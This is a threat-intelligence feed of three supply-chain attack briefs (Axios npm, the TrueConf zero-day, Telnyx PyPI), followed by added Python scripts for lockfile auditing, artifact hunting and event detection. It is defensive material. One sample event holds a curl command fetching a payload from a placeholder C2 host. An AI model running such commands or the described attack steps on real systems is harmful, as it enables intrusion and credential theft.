{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/supply-chain-attack/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":["UNC1069"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","npm","social engineering","rat","unc1069"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer\u0026rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. 
These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.\u003c/li\u003e\n\u003cli\u003eThe attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.\u003c/li\u003e\n\u003cli\u003eA meeting is scheduled on Microsoft Teams, during which a fake \u0026ldquo;RTC Connection\u0026rdquo; error message is displayed.\u003c/li\u003e\n\u003cli\u003eThe attacker prompts the developer to install a \u0026ldquo;Teams update\u0026rdquo; to resolve the error.\u003c/li\u003e\n\u003cli\u003eThe fake update is a RAT, granting the attacker remote access to the developer\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe attacker steals the developer\u0026rsquo;s npm credentials, bypassing MFA by reusing the developer\u0026rsquo;s already authenticated npm session.\u003c/li\u003e\n\u003cli\u003eThe attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.\u003c/li\u003e\n\u003cli\u003eSystems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. 
This can lead to further unauthorized access, data breaches, and potential financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAudit npm installations and lockfiles for the plain-crypto-js dependency, particularly in projects that resolved Axios to version 1.14.1 or 0.30.4.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious NPM Package Installation\u0026rdquo; to detect potentially malicious package installations based on unusual parent processes.\u003c/li\u003e\n\u003cli\u003eBlock the domain associated with the malicious dependency plain-crypto-js at the DNS resolver.\u003c/li\u003e\n\u003cli\u003eEducate developers about social engineering tactics and the risks of installing software from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-04T20:30:42Z","date_published":"2026-04-04T20:30:42Z","id":"/briefs/2026-04-axios-npm-hack/","summary":"North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.","title":"Axios npm Package Compromised via Social Engineering","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/"},{"_cs_actors":["TrueChaos"],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-3502"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["trueconf","zero-day","cve-2026-3502","supply-chain attack"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA threat actor, possibly with a Chinese nexus, is exploiting CVE-2026-3502, a zero-day vulnerability in TrueConf versions 8.1.0 through 8.5.2. 
This vulnerability allows an attacker who controls a TrueConf server to replace legitimate client updates with malicious executables, leading to arbitrary code execution on connected clients. The attacks, tracked as \u0026ldquo;TrueChaos\u0026rdquo; since the beginning of 2026, have targeted government entities in Southeast Asia. TrueConf, a video conferencing platform popular among military forces, government agencies, oil and gas corporations, and air traffic management companies, saw increased adoption during the COVID-19 pandemic. The attacker exploits the lack of an integrity check in the client update mechanism to deliver malware disguised as a legitimate TrueConf update. A fix was released in version 8.5.3 in March 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains control of an on-premises TrueConf server.\u003c/li\u003e\n\u003cli\u003eThe attacker replaces the expected update package with a malicious executable file.\u003c/li\u003e\n\u003cli\u003eThe compromised TrueConf server distributes the malicious update to connected clients.\u003c/li\u003e\n\u003cli\u003eClients trust the server-provided update without validating its integrity and download the malicious file.\u003c/li\u003e\n\u003cli\u003eThe malicious file is executed under the guise of a legitimate TrueConf update, initiating DLL sideloading.\u003c/li\u003e\n\u003cli\u003eBuilt-in reconnaissance tools such as tasklist and tracert are run.\u003c/li\u003e\n\u003cli\u003ePrivilege escalation is attempted using a UAC bypass that abuses iscsicpl.exe to sideload a DLL.\u003c/li\u003e\n\u003cli\u003ePersistence is established, and network traffic indicates potential deployment of the Havoc C2 framework for further command execution and payload delivery.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of CVE-2026-3502 allows attackers to execute arbitrary code on all TrueConf clients connected to a compromised server. 
This can lead to widespread malware infections, data theft, and potential compromise of sensitive systems, especially in sectors like government, military, and critical infrastructure that heavily rely on TrueConf for secure communications. The number of affected organizations is potentially high, considering that over 100,000 organizations transitioned to TrueConf during the COVID-19 pandemic.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade TrueConf servers to version 8.5.3 or later to patch CVE-2026-3502.\u003c/li\u003e\n\u003cli\u003eMonitor endpoints for \u003ccode\u003epoweriso.exe\u003c/code\u003e or \u003ccode\u003e7z-x64.dll\u003c/code\u003e, the file names reported in this campaign; PowerISO is also a legitimate product, so confirm the file location, signature, and parent process before treating a hit as a compromise.\u003c/li\u003e\n\u003cli\u003eInvestigate systems with suspicious artifacts like \u003ccode\u003e%AppData%\\Adobe\\update.7z\u003c/code\u003e (that is, \u003ccode\u003eAppData\\Roaming\\Adobe\\update.7z\u003c/code\u003e in the user profile) or \u003ccode\u003eiscsiexe.dll\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious TrueConf Update Execution\u0026rdquo; to detect malicious updates executing from the TrueConf directory.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to known Havoc C2 infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-02T12:00:00Z","date_published":"2026-04-02T12:00:00Z","id":"/briefs/2026-04-trueconf-zero-day/","summary":"Hackers exploited a zero-day vulnerability (CVE-2026-3502) in TrueConf conference servers to execute arbitrary files on connected endpoints, potentially deploying the Havoc C2 framework.","title":"TrueConf Zero-Day Exploitation Leading to Arbitrary Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-trueconf-zero-day/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply chain attack","pypi","credential 
theft","steganography"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 27, 2026, the Telnyx package on the Python Package Index (PyPI) was compromised by the threat actor TeamPCP. Malicious versions 4.87.1 and 4.87.2 were uploaded, containing credential-stealing malware concealed within WAV audio files. This supply-chain attack targeted developers using the Telnyx Python SDK, a popular package with over 740,000 monthly downloads, used for integrating communication services into applications. The malicious code resides in the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file and executes upon import. The compromise is believed to have originated from stolen credentials for the publishing account on the PyPI registry. TeamPCP has been linked to previous supply-chain attacks and wiper campaigns against Iranian systems, highlighting the group\u0026rsquo;s focus on disrupting software development and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the Telnyx PyPI account, likely through credential theft.\u003c/li\u003e\n\u003cli\u003eMalicious versions 4.87.1 and 4.87.2 of the Telnyx package are published to PyPI.\u003c/li\u003e\n\u003cli\u003eWhen a developer installs the compromised Telnyx package, the \u003ccode\u003etelnyx/_client.py\u003c/code\u003e file is executed upon import.\u003c/li\u003e\n\u003cli\u003eOn Linux and macOS, a detached process is spawned to download a second-stage payload disguised as a WAV audio file (\u003ccode\u003eringtone.wav\u003c/code\u003e) from a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eSteganography is used to hide malicious code within the WAV file\u0026rsquo;s data frames.\u003c/li\u003e\n\u003cli\u003eThe embedded payload is extracted using an XOR-based decryption routine and executed in memory.\u003c/li\u003e\n\u003cli\u003eThe malware harvests sensitive 
data, including SSH keys, credentials, cloud tokens, cryptocurrency wallets, and environment variables.\u003c/li\u003e\n\u003cli\u003eIf Kubernetes is present, the malware enumerates cluster secrets and deploys privileged pods to access the underlying host systems.\u003c/li\u003e\n\u003cli\u003eOn Windows, a different WAV file (\u003ccode\u003ehangup.wav\u003c/code\u003e) is downloaded, from which an executable named \u003ccode\u003emsbuild.exe\u003c/code\u003e is extracted and written to the Startup folder for persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could result in widespread compromise of systems utilizing the Telnyx Python SDK. Over 740,000 monthly downloads indicate a large potential victim pool. Stolen credentials and secrets can lead to unauthorized access to cloud resources, sensitive data exfiltration, and further lateral movement within compromised networks. For systems running Kubernetes, the attacker could gain control over the entire cluster, leading to significant disruption and data loss. 
Developers who installed the malicious packages are advised to consider their systems fully compromised and rotate all secrets as soon as possible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify and remove Telnyx versions 4.87.1 and 4.87.2 from all environments, reverting to version 4.87.0 as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for processes spawned by Python interpreters (\u003ccode\u003epython.exe\u003c/code\u003e, \u003ccode\u003epython3\u003c/code\u003e) attempting to download files with the \u003ccode\u003e.wav\u003c/code\u003e extension, using the \u0026ldquo;Detect Suspicious Python WAV Download\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls and multi-factor authentication for PyPI accounts used to publish packages to prevent similar supply chain attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect msbuild.exe in Startup Folder\u0026rdquo; Sigma rule to identify potential persistence attempts on Windows systems.\u003c/li\u003e\n\u003cli\u003eRotate all secrets and credentials on any system that has imported the malicious Telnyx package.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T12:00:00Z","date_published":"2026-03-28T12:00:00Z","id":"/briefs/2026-03-teampcp-telnyx/","summary":"The TeamPCP threat actor compromised the Telnyx PyPI package, injecting credential-stealing malware hidden within WAV audio files to target Linux, macOS, and Windows systems.","title":"TeamPCP Backdoors Telnyx PyPI Package with Steganographic Malware","url":"https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/"}],"language":"en","title":"CraftedSignal Threat Feed — Supply-Chain Attack","version":"https://jsonfeed.org/version/1.1"}
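The Axios brief in the feed above recommends checking projects for the compromised Axios releases (1.14.1 and 0.30.4) and for the plain-crypto-js dependency they pulled in. The script below is an added example of that check, not code from CraftedSignal or the Axios project. It audits an npm package-lock.json in lockfile versions 1, 2 and 3 and reports every axios entry at a compromised version and every plain-crypto-js entry at any version; the lockfile embedded in it is constructed for the demonstration and is not a real project's lockfile.

```python
"""Audit npm lockfiles for the compromised Axios releases and the
plain-crypto-js dependency described in the Axios brief.

Added example, not CraftedSignal's or the Axios project's code. Handles
package-lock.json lockfileVersion 1 (nested 'dependencies') and 2/3
(flat 'packages' map keyed by node_modules path).
"""
import json
import sys
from pathlib import Path

COMPROMISED_AXIOS = {"1.14.1", "0.30.4"}
MALICIOUS_PACKAGE = "plain-crypto-js"


def _check(name, version, location):
    """Return a finding for one resolved package, or an empty list."""
    if name == "axios" and version in COMPROMISED_AXIOS:
        return [f"axios@{version} (compromised release) at {location}"]
    if name == MALICIOUS_PACKAGE:
        return [f"{name}@{version} (malicious dependency) at {location}"]
    return []


def _walk_v1(deps, findings, prefix=""):
    """lockfileVersion 1: recurse through nested 'dependencies' maps."""
    for name, meta in (deps or {}).items():
        findings.extend(_check(name, meta.get("version"), f"{prefix}{name}"))
        _walk_v1(meta.get("dependencies"), findings, prefix=f"{prefix}{name} > ")


def audit_lockfile(lock):
    """Return a list of human-readable findings for a parsed package-lock.json."""
    findings = []
    if lock.get("lockfileVersion", 1) >= 2:
        for path, meta in lock.get("packages", {}).items():
            if not path:  # '' is the root project itself
                continue
            # 'node_modules/a/node_modules/@scope/b' -> '@scope/b'
            name = path.rsplit("node_modules/", 1)[-1]
            findings.extend(_check(name, meta.get("version"), path))
    else:
        _walk_v1(lock.get("dependencies"), findings)
    return findings


# Constructed sample (not a real project): a v3 lockfile that resolved
# axios to the compromised 1.14.1 release, which pulls in plain-crypto-js.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {
            "version": "1.14.1",
            "dependencies": {"plain-crypto-js": "^1.0.0"},
        },
        "node_modules/axios/node_modules/plain-crypto-js": {"version": "1.0.0"},
        "node_modules/follow-redirects": {"version": "1.15.6"},
    },
}

if __name__ == "__main__":
    # Usage: python audit_axios.py [package-lock.json ...]
    # With no arguments the constructed sample lockfile is audited.
    files = [Path(p) for p in sys.argv[1:]]
    locks = [json.loads(f.read_text()) for f in files] or [SAMPLE_LOCK]
    for lock in locks:
        for line in audit_lockfile(lock) or ["no findings"]:
            print(line)
```

A clean lockfile that never resolved axios to 1.14.1 or 0.30.4 during the three-hour window produces no findings; a hit on plain-crypto-js anywhere in the tree should be treated as evidence that the compromised release was installed, whatever axios version the lockfile shows now.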
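The TrueConf brief in the feed above lists file artifacts to hunt for: poweriso.exe, 7z-x64.dll, iscsiexe.dll and an update.7z under the Adobe roaming-profile folder. The script below is an added hunting example, not code from CraftedSignal or TrueConf. It matches those names against a file inventory (a constructed list here, or a live directory walk when given roots on the command line). Because %AppData% already expands to the AppData\Roaming folder, the archive is matched as AppData\Roaming\Adobe\update.7z; iscsicpl.exe itself is a legitimate Windows binary and is deliberately not flagged, only the sideloaded iscsiexe.dll is.

```python
"""Hunt for the TrueChaos file artifacts named in the TrueConf brief.

Added example, not CraftedSignal's or TrueConf's code. classify() labels
a single path; hunt() runs it over any iterable of paths (an EDR file
inventory, or walk() over real directories). The sample inventory is
constructed and does not come from a real host.
"""
import os
import re
import sys

# File names reported for the campaign; matched case-insensitively on the basename.
ARTIFACT_NAMES = {"poweriso.exe", "7z-x64.dll", "iscsiexe.dll"}
# update.7z only matters under <profile>\AppData\Roaming\Adobe\ (what %AppData%\Adobe resolves to).
UPDATE_ARCHIVE = re.compile(r"[\\/]appdata[\\/]roaming[\\/]adobe[\\/]update\.7z$", re.IGNORECASE)


def classify(path):
    """Return an IoC label for a path, or None if it matches no artifact."""
    name = re.split(r"[\\/]", path)[-1].lower()
    if name in ARTIFACT_NAMES:
        return f"artifact:{name}"
    if UPDATE_ARCHIVE.search(path):
        return "artifact:update.7z"
    return None


def hunt(paths):
    """Return [(label, path)] for every path in the iterable that matches an IoC."""
    return [(label, p) for p in paths if (label := classify(p))]


def walk(roots):
    """Yield every file path under the given directory roots (for live hunts)."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for f in files:
                yield os.path.join(dirpath, f)


# Constructed file inventory (not captured from a real machine). It mixes the
# reported artifacts with benign look-alikes to show what is and is not flagged.
SAMPLE_PATHS = [
    r"C:\Users\dev\AppData\Roaming\Adobe\update.7z",
    r"C:\Users\dev\AppData\Roaming\Adobe\other.7z",
    r"C:\ProgramData\TrueConf\Client\update\poweriso.exe",
    r"C:\ProgramData\TrueConf\Client\update\7z-x64.dll",
    r"C:\Windows\System32\iscsicpl.exe",
    r"C:\Users\dev\AppData\Local\Temp\iscsiexe.dll",
    r"C:\Program Files\TrueConf\Client\TrueConf.exe",
]

if __name__ == "__main__":
    # Usage: python hunt_truechaos.py [DIR ...]
    # Without arguments the constructed inventory is scanned instead of the filesystem.
    source = walk(sys.argv[1:]) if len(sys.argv) > 1 else SAMPLE_PATHS
    for label, path in hunt(source):
        print(f"{label}\t{path}")
```

A hit is a lead, not a verdict: PowerISO is also a legitimately installed product, so a poweriso.exe match should be checked for its location (the brief points at the TrueConf directory), its signature and the process that wrote it before the host is declared compromised.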
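The Telnyx brief in the feed above names two Sigma rules: one for a Python interpreter downloading a .wav payload, one for msbuild.exe being written to a Windows Startup folder. The detection logic below is an added example that reimplements those two ideas in Python over constructed telemetry; it is not CraftedSignal's published rule logic. The event schema (EventType, Image, ParentImage, CommandLine, TargetFilename, modelled on Sysmon field names) and all sample events are assumptions made for the demonstration.

```python
"""Two detections from the Telnyx brief, run over Sysmon-style events.

Added example, not CraftedSignal's Sigma rules. Rule 'python_wav_download'
fires when a Python interpreter spawns a child whose command line fetches a
.wav URL, or itself writes a .wav file. Rule 'msbuild_in_startup' fires when
a file named msbuild.exe is created inside a Start Menu\\Programs\\Startup
folder, where a genuine MSBuild never lives. Event dicts and field names are
constructed for this example.
"""
import re
from urllib.parse import urlparse

# python, python3, python3.12, python.exe, pythonw.exe ...
PYTHON_IMAGE = re.compile(r"^pythonw?(\d+(\.\d+)?)?(\.exe)?$", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)


def _basename(path):
    return re.split(r"[\\/]", path or "")[-1]


def _is_python(image):
    return bool(PYTHON_IMAGE.match(_basename(image)))


def _fetches_wav(cmdline):
    """True if any URL on the command line points at a .wav resource."""
    return any(urlparse(u).path.lower().endswith(".wav") for u in URL.findall(cmdline or ""))


def detect(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    alerts = []
    for ev in events:
        kind = ev.get("EventType")
        if kind == "ProcessCreate" and _is_python(ev.get("ParentImage")) and _fetches_wav(ev.get("CommandLine")):
            alerts.append(("python_wav_download", ev))
        elif kind == "FileCreate":
            target = ev.get("TargetFilename", "")
            if _is_python(ev.get("Image")) and target.lower().endswith(".wav"):
                alerts.append(("python_wav_download", ev))
            if STARTUP_DIR.search(target) and _basename(target).lower() == "msbuild.exe":
                alerts.append(("msbuild_in_startup", ev))
    return alerts


# Constructed sample telemetry (not captured from a real host). The C2 host is
# a placeholder; the brief does not publish one.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": "/usr/bin/python3", "Image": "/usr/bin/curl",
     "CommandLine": "curl -s -o /tmp/ringtone.wav http://c2.example.invalid/ringtone.wav"},
    {"EventType": "ProcessCreate", "ParentImage": "/usr/bin/python3", "Image": "/usr/bin/curl",
     "CommandLine": "curl -s https://pypi.org/simple/telnyx/"},
    {"EventType": "FileCreate", "Image": "C:\\Python312\\python.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Temp\\hangup.wav"},
    {"EventType": "FileCreate", "Image": "C:\\Python312\\python.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msbuild.exe"},
    {"EventType": "FileCreate", "Image": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe",
     "TargetFilename": "C:\\src\\app\\bin\\app.dll"},
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(rule, "->", ev.get("CommandLine") or ev.get("TargetFilename"))
```

The second sample event shows the expected false-negative boundary: a Python-spawned curl talking to PyPI is ordinary tooling and must not fire, which is why the rule keys on the .wav path in the URL rather than on Python spawning a downloader at all.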